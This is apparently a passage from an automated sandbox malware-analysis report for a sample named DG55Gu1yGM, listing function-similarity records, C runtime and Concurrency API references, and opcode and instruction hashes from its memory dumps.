                                                                                                                                                                                                                                        • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2250070497-0
                                                                                                                                                                                                                                        • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                        • Instruction ID: 87ce0850bcecede6e98cf9e7f548474b874ab8335873a3ab6692b42836f89942
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3118EB6800204AFC715DF64C880ECAF7BAEF19320F01861EE95A87591DB70E954CBA0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
                                                                                                                                                                                                                                        • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
                                                                                                                                                                                                                                        • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
                                                                                                                                                                                                                                        • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 78362717-0
                                                                                                                                                                                                                                        • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                        • Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::location::_Assign.LIBCMT ref: 02142BB1
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02142BCF
                                                                                                                                                                                                                                          • Part of subcall function 02138687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 021386A8
                                                                                                                                                                                                                                          • Part of subcall function 02138687: Hash.LIBCMT ref: 021386E8
                                                                                                                                                                                                                                        • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02142BD8
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02142BF8
                                                                                                                                                                                                                                          • Part of subcall function 0213F6DF: Hash.LIBCMT ref: 0213F6F1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2250070497-0
                                                                                                                                                                                                                                        • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                        • Instruction ID: ec8ca585eda384a979b30d29286f6fc15997febf5c7dbe5ae9991d975d689263
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C90117B6400604AFC725DFA5C881EDAB7EAEF49320F008A1EA95A87550DB70F9548BA0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 021250D1
                                                                                                                                                                                                                                          • Part of subcall function 0212BDAE: __EH_prolog3_GS.LIBCMT ref: 0212BDB5
                                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 0212511C
                                                                                                                                                                                                                                        • __Getcoll.LIBCPMT ref: 0212512B
                                                                                                                                                                                                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0212513B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1836011271-0
                                                                                                                                                                                                                                        • Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                                                                                                                                                        • Instruction ID: 3063dea6045ac9a5a506fe291e3669a0ac628bdacabc8d73e7b952e37c5f518f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B01BC71890328EFDB04EFA4C480BDCBBB2FF54325F51802AE054AB280CB759668CF91
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 02125B8D
                                                                                                                                                                                                                                          • Part of subcall function 0212BDAE: __EH_prolog3_GS.LIBCMT ref: 0212BDB5
                                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 02125BD8
                                                                                                                                                                                                                                        • __Getcoll.LIBCPMT ref: 02125BE7
                                                                                                                                                                                                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02125BF7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1836011271-0
                                                                                                                                                                                                                                        • Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                        • Instruction ID: 2d6970d396e017f5fc60a40ded20f10682e2b11abba9144e082de3f95873bb70
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9017171990318EFDB04EFA4C484BDDB7B2FF14315F51802AE055AB280DB759568CF95
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00405926
                                                                                                                                                                                                                                          • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
                                                                                                                                                                                                                                        • __Getcoll.LIBCPMT ref: 00405980
                                                                                                                                                                                                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1836011271-0
                                                                                                                                                                                                                                        • Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                                                                                                                                                        • Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0213C170
                                                                                                                                                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0213C180
                                                                                                                                                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0213C190
                                                                                                                                                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0213C1A4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3973403980-0
                                                                                                                                                                                                                                        • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                        • Instruction ID: b65752fef761a54935ab22da55b606504ba6a649f1c6913d20272d43b2c0b64d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4501A47A484149EBDF179E94DC018AE3BA7AB25260F048412F928A4060D732C6B0AAC1
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                                                                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                                                                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                                                                                                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3973403980-0
                                                                                                                                                                                                                                        • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                        • Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0213378C
                                                                                                                                                                                                                                          • Part of subcall function 02132B16: ___crtGetTimeFormatEx.LIBCMT ref: 02132B2C
                                                                                                                                                                                                                                          • Part of subcall function 02132B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02132B4B
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 021337A8
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021337BE
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 021337CC
                                                                                                                                                                                                                                          • Part of subcall function 021328EC: SetThreadPriority.KERNEL32(?,?), ref: 021328F8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1674182817-0
                                                                                                                                                                                                                                        • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                        • Instruction ID: fc9ecde593dc85880803126959aff92b664132d771b7fc19ace6906f08c2aeca
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 36F0A7B2A802153EE725B7755C06FBB36DD9B01751F500876B915E6181EFA8D8048AF8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02131342
                                                                                                                                                                                                                                          • Part of subcall function 02130BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02130BD6
                                                                                                                                                                                                                                          • Part of subcall function 02130BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02130BF7
                                                                                                                                                                                                                                        • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02131355
                                                                                                                                                                                                                                        • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02131361
                                                                                                                                                                                                                                        • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0213136A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4284812201-0
                                                                                                                                                                                                                                        • Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                        • Instruction ID: f341a5720d415fcb5f597e54ae1b9adcc5ad6ae0e3b816668e80c147bcea7e2c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CF02E312C0308BF8F1ABAB808105BE32E7AF95324F080129E422AF3C0DF718D018A94
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
                                                                                                                                                                                                                                          • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
                                                                                                                                                                                                                                          • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
                                                                                                                                                                                                                                        • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
                                                                                                                                                                                                                                        • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
                                                                                                                                                                                                                                        • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4284812201-0
                                                                                                                                                                                                                                        • Opcode ID: fd7acda8583d43d34e0fea9ad2346c924928eae7e839b4fe7c8e1ae8ec2b6d3b
                                                                                                                                                                                                                                        • Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd7acda8583d43d34e0fea9ad2346c924928eae7e839b4fe7c8e1ae8ec2b6d3b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
                                                                                                                                                                                                                                          • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
                                                                                                                                                                                                                                          • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00413541
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
                                                                                                                                                                                                                                          • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1674182817-0
                                                                                                                                                                                                                                        • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                        • Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0213D088
                                                                                                                                                                                                                                        • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0213D0AC
                                                                                                                                                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0213D0BF
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0213D0CD
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3657713681-0
                                                                                                                                                                                                                                        • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                        • Instruction ID: 5907dfe61fd1196411322f436418b0abe9503ecd082520103185e998751fbf21
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1FF09E35A80304ABC726FB50FC40D5EB37B9FD0F14361857AD90517281DF31E90ACA92
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Cnd_initX.LIBCPMT ref: 02125A83
                                                                                                                                                                                                                                        • __Cnd_signal.LIBCPMT ref: 02125A8F
                                                                                                                                                                                                                                        • std::_Cnd_initX.LIBCPMT ref: 02125AA4
                                                                                                                                                                                                                                        • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02125AAB
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2059591211-0
                                                                                                                                                                                                                                        • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                        • Instruction ID: 86b80e8b7aa20c1876f0869ae08c218667f64390790edee2a780229d9168aa9c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86F0A735480710AFEB25B770E80571A73B3AF01724F144519F045568A0CF7AA87D4E55
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0213286F
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,02138830,?,?,?,?,00000000,?,00000000), ref: 0213287E
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02132894
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 021328A2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3803302727-0
                                                                                                                                                                                                                                        • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                        • Instruction ID: ca065bbb234a0734077b82b14016ccf8281ef44a045786d7c8df2636031eb357
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58F0A03464010ABBCF01FFE8CD45EAF37B96B00701F200660B914E20A0DB34DA149BA4
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3803302727-0
                                                                                                                                                                                                                                        • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                        • Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___crtCreateEventExW.LIBCPMT ref: 02132593
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,02130DA0), ref: 021325A1
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021325B7
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 021325C5
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 200240550-0
                                                                                                                                                                                                                                        • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                        • Instruction ID: a66cf5390489279ce2ae19876200e9fd91efaddd63e6e5636b27d88306a84465
